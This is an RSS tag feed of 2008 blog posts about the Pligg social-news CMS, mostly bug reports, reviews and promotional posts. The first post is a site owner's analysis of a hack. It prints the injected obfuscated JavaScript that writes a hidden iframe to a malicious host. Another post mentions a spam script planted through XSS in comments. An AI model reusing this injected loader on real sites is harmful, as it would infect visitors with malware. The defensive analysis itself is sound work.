<?xml version="1.0" encoding="UTF-8"?><!-- generator="wordpress.com" -->
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	>

<channel>
	<title>pligg &amp;laquo; WordPress.com Tag Feed</title>
	<link>http://wordpress.com/tag/pligg/</link>
	<description>Feed of posts on WordPress.com tagged "pligg"</description>
	<pubDate>Mon, 13 Oct 2008 17:16:35 +0000</pubDate>

	<generator>http://wordpress.com/tags/</generator>
	<language>en</language>

<item>
<title><![CDATA[Recent Reports of pligg sites being hacked yet again]]></title>
<link>http://pliggsucks.wordpress.com/?p=17</link>
<pubDate>Wed, 08 Oct 2008 03:09:55 +0000</pubDate>
<dc:creator>pliggsucks</dc:creator>
<guid>http://pliggsucks.pl.wordpress.com/2008/10/08/recent-reports-of-pligg-sites-being-hacked-yet-again/</guid>
<description><![CDATA[My pligg was hacked too.  While I took the suggested measures in this forum I also dug in to find ou]]></description>
<content:encoded><![CDATA[<p>My pligg was hacked too.  While I took the suggested measures in this forum I also dug in to find out what was going on.</p>
<p>The script that was added just befor the closing body tag of my site has two parts. The first part simply unescapes a string which results in the following function:<br />
&#60;script language="javascript"&#62;<br />
function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i&#60;s1.length;i++)t+=String.fromCharCod e(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}<br />
&#60;/script&#62;</p>
<p>The second part runs the function passing it a string that gets parsed and written as the following:<br />
&#60;iframe src="http://sexonline.fake.hu/10/js_go_f1.php" style="display:none"&#62;&#60;/iframe&#62;</p>
<p>The full encoded script that produces the above looks like:<br />
&#60;script language=javascript&#62;<br />
document.write(unescape('%3C%73%63%72%69%70%74%20% 6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72 %69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%2 8%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61% 70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C %65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3 D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E% 6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72 %69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%2 8%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29% 2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74 %68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2 E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74% 29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%286 Fliudph%2853vuf%286G%2855kwws%286D22vh%7Brqolqh1id nh1kx2432mvbjrbi41sks%2855%2853vw%7Coh%286G%2855gl vsod%7C%286Dqrqh%2855%286H%286F2liudph%286H3');<br />
&#60;/script&#62;</p>
<p>I have run across this before on some of the high volume sites that I manage. There are a lot of resources to tell you how to block the IP addresses of the common attackers, but that can always change.</p>
<p>The one successful way that we were able to get around it was to put a script in place that will cache your clean file structure, monitor it, and disallow any changes to it unless specified in the config file. It cannot "stop" the hacer, but it will ensure that if they do get in they cannot be successful in contaminating your site and scaring off your visitors.</p>
<p><a href="http://forums.pligg.com/general-help/14309-my-pligg-site-hacked-2.html">http://forums.pligg.com/general-help/14309-my-pligg-site-hacked-2.html</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[You Can Submit same story/url twice. ]]></title>
<link>http://pliggsucks.wordpress.com/?p=14</link>
<pubDate>Wed, 08 Oct 2008 03:05:46 +0000</pubDate>
<dc:creator>pliggsucks</dc:creator>
<guid>http://pliggsucks.pl.wordpress.com/2008/10/08/you-can-submit-same-storyurl-twice/</guid>
<description><![CDATA[During submission user can submit same story by posting once using www. and once without www.
http:/]]></description>
<content:encoded><![CDATA[<p>During submission user can submit same story by posting once using www. and once without www.</p>
<p><a href="http://forums.pligg.com/bug-report/15119-minor-submit-same-story-url-twice.html">http://forums.pligg.com/bug-report/15119-minor-submit-same-story-url-twice.html</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[double vote made easy on a pligg based website]]></title>
<link>http://pliggsucks.wordpress.com/?p=10</link>
<pubDate>Wed, 08 Oct 2008 03:01:26 +0000</pubDate>
<dc:creator>pliggsucks</dc:creator>
<guid>http://pliggsucks.pl.wordpress.com/2008/10/08/double-vote-made-easy-on-a-pligg-based-website/</guid>
<description><![CDATA[There is a problem in the voting system that compromises all not-so-huge pligg-based communities.
Wh]]></description>
<content:encoded><![CDATA[<p>There is a problem in the voting system that compromises all not-so-huge pligg-based communities.</p>
<p>When an identified user votes, checks are made not to allow him to vote twice. This works as well when an anonymous user votes, on the IP basis.</p>
<p>But when an identified user votes, then disconnects (or open the app in an other browser), he can vote twice as anonymous.</p>
<p>This is a problem for all localized or specialized communities that have ten or so votes per link.</p>
<p>- tested version: 9.9.5</p>
<p>- way to reproduce:<br />
1. login<br />
2. vote<br />
3. logout<br />
4. vote</p>
<p><a href="http://forums.pligg.com/bug-report/14871-double-vote-made-easy.html" target="_self">http://forums.pligg.com/bug-report/14871-double-vote-made-easy.html</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[dollars5 disappeared?]]></title>
<link>http://pliggsucks.wordpress.com/?p=6</link>
<pubDate>Wed, 08 Oct 2008 02:57:48 +0000</pubDate>
<dc:creator>pliggsucks</dc:creator>
<guid>http://pliggsucks.pl.wordpress.com/2008/10/08/dollars5-disappeared/</guid>
<description><![CDATA[Anyone been dealing with dollars5 lately? I payed them to build some custom features for my pligg si]]></description>
<content:encoded><![CDATA[<p>Anyone been dealing with dollars5 lately? I payed them to build some custom features for my pligg site and needed some changes made and have been emailing them and havent heard from them in six days, Ive sent 5 emails and havent gotten a single reply, any idea where they might be?!?</p>
<p><a href="http://forums.pligg.com/off-topic/15181-dollars5-disappeared.html">http://forums.pligg.com/off-topic/15181-dollars5-disappeared.html</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Pligg, The Open Source Digg Clone]]></title>
<link>http://ucanhireme.wordpress.com/?p=64</link>
<pubDate>Sun, 28 Sep 2008 05:09:38 +0000</pubDate>
<dc:creator>ucanhireme</dc:creator>
<guid>http://ucanhireme.pl.wordpress.com/2008/09/28/pligg-the-open-source-digg-clone/</guid>
<description><![CDATA[Pligg is an open source Content Management System (CMS) available to download for free. Pligg has pe]]></description>
<content:encoded><![CDATA[<p>Pligg is an open source Content Management System (CMS) available to <a href="http://forums.pligg.com/current-version/">download for free</a>. Pligg has perfected content management in a unique way that encourages users to participate and control the content on the site. This makes the site user-moderated and allows for "social publishing" where the stories are created and promoted by members not website editors. Pligg CMS is based on PHP and MySQL technologies that allow it to be installed on almost any web host on a relatively small budget. For support please visit the <a href="http://forums.pligg.com/">Pligg Forum</a> where you can find help 24 hours a<br />
day thanks to our excellent development team and contributors. Pligg is free software, but you are welcome<br />
to <a href="http://forums.pligg.com/billspaypal.php">donate</a> any amount by clicking the button below.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[XSS vulnerability on comment?]]></title>
<link>http://pliggsucks.wordpress.com/?p=3</link>
<pubDate>Fri, 26 Sep 2008 17:05:20 +0000</pubDate>
<dc:creator>pliggsucks</dc:creator>
<guid>http://pliggsucks.pl.wordpress.com/2008/09/26/xss-vulnerability-on-comment/</guid>
<description><![CDATA[I upgraded mysite to 9.9.5 a few days ago,and still the spam comes.
When I went to admin_comments.ph]]></description>
<content:encoded><![CDATA[<p>I upgraded mysite to 9.9.5 a few days ago,and still the spam comes.<br />
When I went to admin_comments.php.the page automatic redirect to a spam site.<br />
I check the html code of admin_comments.php and found that spammer insert a script(<a rel="nofollow" href="http://bigbigsavings.info/rd.js" target="_blank">http://bigbigsavings.info/rd.js</a>) in the comment.</p>
<p><strong>Visit:</strong> <a href="http://forums.pligg.com/bug-report/15049-xss-vulnerability-comment.html#post68077">XSS vulnerability on comment?</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Free social scripts collection]]></title>
<link>http://operadevil.wordpress.com/?p=84</link>
<pubDate>Sun, 31 Aug 2008 00:22:05 +0000</pubDate>
<dc:creator>operadevil</dc:creator>
<guid>http://operadevil.pl.wordpress.com/2008/08/31/free-social-scripts-collection/</guid>
<description><![CDATA[Meta Forum
Meta Forum
Info:
http://www.blursoft.com/metaForum/
Demo:
http://www.planetblur.org/beta/]]></description>
<content:encoded><![CDATA[<h3>Meta Forum</h3>
[caption id="" align="aligncenter" width="450" caption="Meta Forum"]<img src="http://www.blursoft.com/metaForum/metaSiteHeader.png" alt="Meta Forum" width="450" />[/caption]
<p style="text-align:center;">Info:</p>
<p style="text-align:center;"><a href="http://www.blursoft.com/metaForum/">http://www.blursoft.com/metaForum/</a></p>
<p style="text-align:center;">Demo:</p>
<p style="text-align:center;"><a href="http://www.planetblur.org/beta/">http://www.planetblur.org/beta/</a></p>
<p style="text-align:center;">Download:</p>
<p style="text-align:center;"><a href="http://www.blursoft.com/metaForum/releases/mf-beta-0.1046.tar.gz">http://www.blursoft.com/metaForum/releases/mf-beta-0.1046.tar.gz</a></p>
<h3>Tiny Tiny RSS</h3>
[caption id="" align="aligncenter" width="450" caption="Tiny Tiny RSS"]<img src="http://tt-rss.org/images/site_shot_3.png" alt="Tiny Tiny RSS" width="450" />[/caption]
<p style="text-align:center;">Info:</p>
<p style="text-align:center;"><a href="http://tt-rss.org/trac/">http://tt-rss.org/trac/</a></p>
<p style="text-align:center;">Demo:</p>
<p style="text-align:center;"><a href="http://tt-rss.org/demo/tt-rss.php">http://tt-rss.org/demo/tt-rss.php</a></p>
<p style="text-align:center;">Download:</p>
<p style="text-align:center;"><a href="http://tt-rss.org/download/tt-rss-1.2.26.tar.gz">http://tt-rss.org/download/tt-rss-1.2.26.tar.gz</a></p>
<h3>Mahara</h3>
[caption id="" align="aligncenter" width="450" caption="Mahara"]<img src="http://download.freshmeat.net/screenshots/65610.png" alt="Mahara" width="450" />[/caption]
<p style="text-align:center;">Info:</p>
<p style="text-align:center;"><a href="http://www.mahara.org">http://www.mahara.org</a></p>
<p style="text-align:center;">Demo:</p>
<p style="text-align:center;"><a href="http://demo.mahara.org/">http://demo.mahara.org</a></p>
<p style="text-align:center;">Download:</p>
<p style="text-align:center;"><a href="http://eduforge.org/frs/download.php/850/mahara-1.0.4.zip">http://eduforge.org/frs/download.php/850/mahara-1.0.4.zip</a></p>
<h3>Scuttle</h3>
[caption id="" align="aligncenter" width="450" caption="Scuttle"]<img src="http://www.coderhome.net/projectimage/Scuttle.gif" alt="Scuttle" width="450" />[/caption]
<p style="text-align:center;">Info:</p>
<p style="text-align:center;"><a href="http://sourceforge.net/projects/scuttle/">http://sourceforge.net/projects/scuttle/</a></p>
<p style="text-align:center;">Demo</p>
<p style="text-align:center;"><a href="http://tools.splitbrain.org/scuttle/">http://tools.splitbrain.org/scuttle/</a></p>
<p style="text-align:center;">Download:</p>
<p style="text-align:center;"><a href="http://nchc.dl.sourceforge.net/sourceforge/scuttle/scuttle.0.7.2.zip">http://nchc.dl.sourceforge.net/sourceforge/scuttle/scuttle.0.7.2.zip</a></p>
<h3>Magento</h3>
[caption id="" align="aligncenter" width="450" caption="Magento"]<img src="http://www.davidpitlyuk.com/wp-content/uploads/2007/08/magento-screenshot.jpg" alt="Magento" width="450" />[/caption]
<p style="text-align:center;">Info:</p>
<p style="text-align:center;"><a href="www.magentocommerce.com">www.magentocommerce.com</a></p>
<p style="text-align:center;">Demo:</p>
<p style="text-align:center;"><a href="http://demo.magentocommerce.com/">http://demo.magentocommerce.com/</a></p>
<p style="text-align:center;">Download:</p>
<p style="text-align:center;"><a href="http://www.magentocommerce.com/download">http://www.magentocommerce.com/download</a></p>
<h3>Identoo</h3>
[caption id="" align="aligncenter" width="450" caption="Identoo"]<img src="http://lifestreamblog.com/wp-content/uploads/2007/11/identoo_thumb.jpg" alt="Identoo" width="450" />[/caption]
<p style="text-align:center;">Info:</p>
<p style="text-align:center;"><a href="www.noserub.com">www.noserub.com</a></p>
<p style="text-align:center;">Demo:</p>
<p style="text-align:center;"><a href="http://identoo.com/social_stream/">http://identoo.com/social_stream/</a></p>
<p style="text-align:center;">Download:</p>
<p style="text-align:center;"><a href="http://noserub.googlecode.com/files/noserub-0.6.zip">http://noserub.googlecode.com/files/noserub-0.6.zip</a></p>
<hr />
<p style="text-align:center;">More social open source : Download:</p>
<p style="text-align:center;">http://forums.pligg.com/downloads.php</p>
<p style="text-align:center;">http://sourceforge.net/project/platformdownload.php?group_id=176676</p>
<p style="text-align:center;">Heres a few to get the list started:<br />
http://www.drupalution.com/mods<br />
http://www.phpizabi.net/?L=cms.infos.about<br />
http://markaboo.com/<br />
http://sourceforge.net/projects/scuttle/<br />
http://www.pligg.com/<br />
http://www.joomlapolis.com/</p>
<p style="text-align:center;">http://kubelabs.com/phpdugg.php</p>
<p style="text-align:center;">http://elgg.org/</p>
<p style="text-align:center;">http://www.freeglobes.net/</p>
<p style="text-align:center;">http://www.upwarded.com/</p>
<p style="text-align:center;">http://www.blinkk.org/</p>
<p style="text-align:center;">http://wiki.newscloud.com/index.php/…Media_Platform</p>
<p style="text-align:center;">(demo) http://newscloud.com/</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Vor dem Neustart ... Captcha testen]]></title>
<link>http://lieblnk.wordpress.com/?p=34</link>
<pubDate>Mon, 25 Aug 2008 15:35:52 +0000</pubDate>
<dc:creator>ring2</dc:creator>
<guid>http://lieblnk.pl.wordpress.com/2008/08/25/vor-dem-neustart-captcha-testen/</guid>
<description><![CDATA[Ok, ihr habt mich überzeugt.
Viele E-Mails und die Kommentare nach meinem GAU-Posting von letzter W]]></description>
<content:encoded><![CDATA[<p>Ok, ihr habt mich überzeugt.<br />
Viele E-Mails und die Kommentare nach meinem <a href="http://lieblnk.wordpress.com/2008/08/20/mammaaaaa-papa-hat-lieblnk-kaputt-gemacht/">GAU-Posting</a> von letzter Woche haben mich davon überzeugt, dass ein sauberer Schnitt das Beste sei.</p>
<p>Ich werde versuchen aus den alten Daten die schönsten Perlen nochmals zu extrahieren - immerhin sollen die ja bei lieb-link zeitlos sein ;)</p>
<p>Derzeit teste ich - eher unfreiwillig - die Spammer-Blockaden. Das Addieren-Captcha versagt nämlich und auch ohne Startseite ist meine Testinstallation schon wieder voll mit Spamaccounts.<br />
Ich teste nu die Captchas durch, und melde mich wieder ;)</p>
<p>Erik</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Men&eacute;ame ya tiene competencia]]></title>
<link>http://quenosediga.wordpress.com/?p=266</link>
<pubDate>Wed, 23 Jul 2008 05:21:28 +0000</pubDate>
<dc:creator>AFO</dc:creator>
<guid>http://quenosediga.pl.wordpress.com/2008/07/23/meneame-ya-tiene-competencia/</guid>
<description><![CDATA[
En el universo de los CMS en castellano a Menéame le ha salido un hermanito. Muéveme es el nombre]]></description>
<content:encoded><![CDATA[<p style="text-align:center;"><a href="http://quenosediga.files.wordpress.com/2008/07/mueveme-logo.jpg"><img class="alignnone size-full wp-image-267" height="114" alt="" src="http://quenosediga.wordpress.com/files/2008/07/mueveme-logo.jpg" width="500"></a></p>
<p>En el universo de los CMS en castellano a <a href="http://meneame.es" target="_blank">Menéame</a> le ha salido un hermanito. <a href="http://mueveme.es" target="_blank">Muéveme</a> es el nombre de este nuevo gestor de contenidos que tiene un funcionamiento muy similar al de su veterano hermano.</p>
<p>Cualquier usuario puede publicar una noticia y si el resto de visitantes la encuentran interesantes estos la votan para que se promovida a la categoría de publicada.</p>
<p>Hay que decir que al estar empezando la cantidad de noticias publicadas dista mucho de ser la esperada para este tipo de servicio pero parece que lo intentan arreglar permitiendo unas reglas de publicación más flexibles que Menéame.</p>
<p><strong>Actualización:</strong> Leo <a href="http://www.adseok.com/herramientas-seo/compro-meneos/" target="_blank">aquí</a> que es posible manipular el servicio de Menéame para conseguir promocionar los envíos.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Pligg diggs pigs...]]></title>
<link>http://jenipaluska.wordpress.com/?p=3</link>
<pubDate>Mon, 16 Jun 2008 23:05:12 +0000</pubDate>
<dc:creator>jenipaluska</dc:creator>
<guid>http://jenipaluska.pl.wordpress.com/2008/06/16/pligg-diggs-pigs/</guid>
<description><![CDATA[Today I worked on installing and configuring Pligg.  This is very similar to wordpress in the sense]]></description>
<content:encoded><![CDATA[<p>Today I worked on installing and configuring Pligg.  This is very similar to wordpress in the sense that you can download and install different templates.  Then you can edit them from within the application.</p>
<p><strong>The Geeky Way: </strong> I found that using the extension Firebug with the browser Firefox really helped.</p>
<p>While looking for help I was reading a lot of postings about the problems with Pligg but I have to say that I was impressed with the breadth and depth of this application.  They have thought of just about everything (Registration, Forgot Password, Management of postings, etc.).</p>
<p><strong>Today's Challange: </strong> I was a little frustrated that the 9.9.0 versions Pligg (the most recent) has problems with the modules and templates.  However, I found a template that was compatible with 9.9.0 and it is working well now.</p>
<p>Also while working on the design a friend showed me this website "www.colourlovers.com".  I like this site mostly because I am a design-lackey (I lack the ability to design).  But even more than that fact I love the hearts in the favicon.</p>
<p><strong>Something Silly:</strong> I can not help but laugh everytime I read 'Pligg'  it looks so much like 'Pig' and not the intended 'Digg'.</p>
<p>Till next time...</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Categories of diggsamachar]]></title>
<link>http://diggsamachar.wordpress.com/?p=4</link>
<pubDate>Mon, 16 Jun 2008 02:09:41 +0000</pubDate>
<dc:creator>diggsamachar</dc:creator>
<guid>http://diggsamachar.pl.wordpress.com/2008/06/16/categories-of-diggsamachar/</guid>
<description><![CDATA[Here are the categories of diggsamachar.
 http://www.diggsamachar.com/cat.php?id=1 
 http://www.digg]]></description>
<content:encoded><![CDATA[<p>Here are the categories of diggsamachar.</p>
<p><a href="http://www.diggsamachar.com/cat.php?id=1"> http://www.diggsamachar.com/cat.php?id=1 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=2"> http://www.diggsamachar.com/cat.php?id=2 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=3"> http://www.diggsamachar.com/cat.php?id=3 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=4"> http://www.diggsamachar.com/cat.php?id=4 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=5"> http://www.diggsamachar.com/cat.php?id=5 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=6"> http://www.diggsamachar.com/cat.php?id=6 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=7"> http://www.diggsamachar.com/cat.php?id=7 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=8"> http://www.diggsamachar.com/cat.php?id=8 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=9"> http://www.diggsamachar.com/cat.php?id=9 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=10"> http://www.diggsamachar.com/cat.php?id=10 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=11"> http://www.diggsamachar.com/cat.php?id=11 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=12"> http://www.diggsamachar.com/cat.php?id=12 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=13"> http://www.diggsamachar.com/cat.php?id=13 </a><br />
<a href="http://www.diggsamachar.com/cat.php?id=14"> http://www.diggsamachar.com/cat.php?id=14 </a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[...oDesk my Office/Heaven...]]></title>
<link>http://ucanhireme.wordpress.com/?p=24</link>
<pubDate>Thu, 22 May 2008 12:56:12 +0000</pubDate>
<dc:creator>ucanhireme</dc:creator>
<guid>http://ucanhireme.pl.wordpress.com/2008/05/22/odesk-my-officeheaven/</guid>
<description><![CDATA[



Certified Professionals. Verified Work.




oDesk My Office/Heaven
Hi,
I work at oDesk&#8230;you]]></description>
<content:encoded><![CDATA[<table style="height:70px;" border="0" width="687">
<tbody>
<tr>
<td style="background:#fff;"><a href="http://www.odesk.com/w/"><img src="http://www.odesk.com/images/logo.gif" alt="Outsource to Freelancers, IT Companies, Programmers, Web Designers from India, Russia, USA, and more" /></a></td>
<td><a id="tagline" href="http://www.odesk.com/w/">Certified Professionals. Verified Work.</a></td>
</tr>
</tbody>
</table>
<hr />
<h1>oDesk My Office/Heaven</h1>
<p>Hi,<br />
I work at oDesk...you see i got a heaven at earth? :( don't you believe me..???? ok just signup and test oDesk ...i swear if you have little patient and if you interested to earn from home...test heaven happyness then .:) believe me...signup and start apply oDesk job. Give oDesk tests to increase your job quota.</p>
<p>Ohh You want to post a job....No worry...you come at right place ...oDesk is the best place where you can get the planet best service from a 10000000000million talents at this planet...you confuse????Oh ok man just go to odesk and post a job....and dont forgot to email me...if i am right...</p>
<p><a href="http://www.odesk.com/referrals/track/ushahin"><img src="http://www.odesk.com/images/banners/banner_buyer_468x60.gif" alt="The On Demand Global Workforce - oDesk" width="468" height="60" /></a></p>
<p>Oh...you want to hire me...all right ...just click me</p>
<p><a href="http://www.odesk.com/referrals/track/ushahin?redir=http%3A%2F%2Fwww.odesk.com%2Fusers%2F%7E%7Ea0dcad1f86616530"><img src="http://www.odesk.com/images/banners/banner_provider_468x60.gif" alt="The On Demand Global Workforce - oDesk" width="468" height="60" /></a></p>
<p>I would like you see at odesk soon....</p>
<p>Thanks</p>
<p>shahin</p>
<p>shahinbdboy@gmail/yahoo.com</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Groggit - AdSense Revenue Sharing]]></title>
<link>http://cissiboy.wordpress.com/?p=875</link>
<pubDate>Sat, 19 Apr 2008 11:15:05 +0000</pubDate>
<dc:creator>Lorenzo Zanirato</dc:creator>
<guid>http://cissiboy.pl.wordpress.com/2008/04/19/groggit-adsense-revenue-sharing/</guid>
<description><![CDATA[
Cos&#8217;è Groggit? 
Un sistema per salvare e condividere i tuoi preferiti e allo stesso tempo gu]]></description>
<content:encoded><![CDATA[<p style="text-align:center;"><a href="http://www.groggit.com" target="_blank"><img src="http://www.groggit.com/templates/g5/images/logo_ok.gif" alt="" width="150" height="75" /></a></p>
<p><strong>Cos'è <a href="http://www.groggit.com" target="_blank">Groggit</a>? </strong><br />
Un sistema per salvare e condividere i tuoi preferiti e allo stesso tempo guadagnare! Groggit ti permette infatti di pubblicare tutto ciò che ritieni utile per una lettura presente o futura, per condiverlo con gli altri utenti, o semplicemente per far conoscere il tuo blog o sito.</p>
<p>Gli articoli che pubblicherai potranno essere votati dagli altri utenti in base a quanto saranno ritenuti interessanti e/o utili, quindi è importante pubblicare contenuti di qualità. Tu potrai fare lo stesso con ciò che sarà pubblicato dagli altri utenti.I migliori articoli saranno pubblicati automaticamente in base ai voti più alti direttamente in home page garantendoti una maggiore visibilità! Groggit ti permette allo stesso tempo di guadagnare!</p>
<p>Se utilizzi Google AdSense, Groggit ti permette di inserire il tuo codice AdSense in ogni articolo pubblicato, il sistema gestirà gli annunci pubblicati nei tuoi articoli garantendoti il 50% delle esposizioni, andando così ad aumentare i tuoi introiti!</p>
<p><span style="color:#ff0000;"><em><br />
</em></span></p>
<p><span style="color:#ff0000;"><em>Il sito è ancora in fase beta, il tema in via di sviluppo (quindi non prendete paura).<br />
Ricordo che per i primi 50 iscritti al sito, lo share AdSense verrà innalzato all' 80%!</em></span></p>
<p>Groggit si aggiunge ai più famosi <a href="http://www.diggita.it" target="_blank">Diggita</a> e <a href="http://www.pligg.it" target="_blank">Pligg</a></p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Pligggggggg?]]></title>
<link>http://climbingdesign.wordpress.com/?p=9</link>
<pubDate>Wed, 05 Mar 2008 05:07:27 +0000</pubDate>
<dc:creator>lizrd</dc:creator>
<guid>http://climbingdesign.pl.wordpress.com/2008/03/05/pligggggggg/</guid>
<description><![CDATA[The past couple of days, Pligg  has been plaguing me. To answer your question, Pligg is not a very f]]></description>
<content:encoded><![CDATA[<p><img src="http://forums.pligg.com/image.php?u=1068&#38;dateline=1179550772" alt="pligg icon" align="left" height="80" width="80" />The past couple of days, <a href="http://pligg.com/">Pligg </a> has been plaguing me. To answer your question, Pligg is not a very fat and jolly boar, but instead a content management system similar to <a href="http://digg.com/">digg</a>. Basically, content is posted and people vote on the most popular item to raise it to the top of the heap. Pligg is currently a freeware version of this as it's still in beta. And what that means for Pligg is that it doesn't have the most user friendly method of customizing things. This is mainly because I am no PHP expert by any means (though I just might be after finishing up with ol' pliggy).</p>
<p>Round 1- I create a MySQL database, upload files, and change the CHMOD according to Pligg's install instructions. There's a little bit of guess work as they don't spell it out and have neglected to update the instructions for the 9.9 version. It's a little bit difficult mainly due to my inexperience with installing databases, but eventually it's complete. I log in, everything looks great, I change the password, and Pligg promptly locks me out of my own website for no particular reason that I can figure out (Yes, yes, I'm one of those irrational people that tend to blame the technology and not my brain-but I'm working on it. And seriously, Pligg had it in for me). So I uninstall, reinstall, and swiftly establish an account. All is well.</p>
<p>Round 2-The person I'm working for wants some modifications. Should be pretty simple, right? No. The optimist inside my head keeps saying, "Well, there's got to be a simpler way...." and the pessimist tells her to shut up and help her surf the <a href="http://forums.pligg.com/">Pligg forums</a>. Though there's some great people on there that offer a variety of solutions, they are winding and not very awesome when you do random searches. So it takes me a little while to find some tutorials/modifications/hacks for the system. I implement a few. Pligg breaks and gives me an error message that I cannot decipher, despite surfing the forums. After putting the default settings back one by one, testing and still having a broken site, the pessimist wins. I'll reinstall tomorrow.</p>
<p>Round 3- Reinstall, carefully do the most necessary changes, find solutions in random places (who would've thought you change tab text by going into the languages section?), and finally start putting content up on my functioning site, relieved to be done with customization.</p>
<p>In short, unless you know php, Pligg is rather difficult. Or maybe you just have more patience than me. If you want a free CMS, have at it, but if you can, wait until they release the 1.0 version that I can only hope is less buggy and more user friendly. Then again, Pligg 1.0 may not be free, so I guess it all depends on how much you value your time versus your money.</p>
]]></content:encoded>
</item>

</channel>
</rss>
